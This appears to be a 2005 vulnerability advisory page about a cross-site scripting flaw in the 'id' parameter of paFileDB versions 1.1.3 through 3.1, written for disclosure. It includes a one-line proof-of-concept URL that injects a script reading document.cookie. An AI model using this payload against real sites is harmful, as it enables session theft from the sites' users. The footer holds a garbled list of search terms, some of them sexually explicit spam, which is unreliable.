about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PAFileDB ID Parameter Cross-Site Scripting Vulnerability


Title PAFileDB ID Parameter Cross-Site Scripting Vulnerability
Published 2005-03-31-12:00AM
Updated 2005-03-31-04:52PM
Class Input Validation Error
CVE   CAN-2005-0951 CAN-2005-0952
Remote  Yes
Local  No
Credit  Discovery is credited to Diabolic Crab <dcrab@hackerscenter.com>. SecurityReason <sp3x@securityreason.com> may also have independently discovered this issue.
Vulnerable  PHP Arena paFileDB 3.1
PHP Arena paFileDB 3.0 Beta 3.1
PHP Arena paFileDB 3.0
PHP Arena paFileDB 2.1.1
PHP Arena paFileDB 1.1.3
Not Vulnerable  
Code   An exploit is not required.

The following proof of concept is available:
http://www.example.com/pafiledb/pafiledb.php?action=file&id=%22%3E%20%20%3Cscript%3Ealert(document.cookie)%3C/script%3E
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 05:23:55 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
t142t ihab tafik Sexveodes wwww chachi com_phpsho t592t hotBods.co t434t sexbaba.co sinem123 t142t sexbaba.co t434t www.pentho addguest.h wwwanimals 200 /compo arab sex 3 cart inclu phpbb por namitsex i Pak sex ve Sexveodes mambo Remo sex video linux 2.6. deshi.com Sexveodes invision p wapking.ne criticize t889t indiansong arab sex 3 free porno Animal gir PHP+guestb Nero 6.6 mambo Remo mumthas oipen ssl sxe-inject remember traffic port 1100 t751t Www.sexy.v Login to C t288t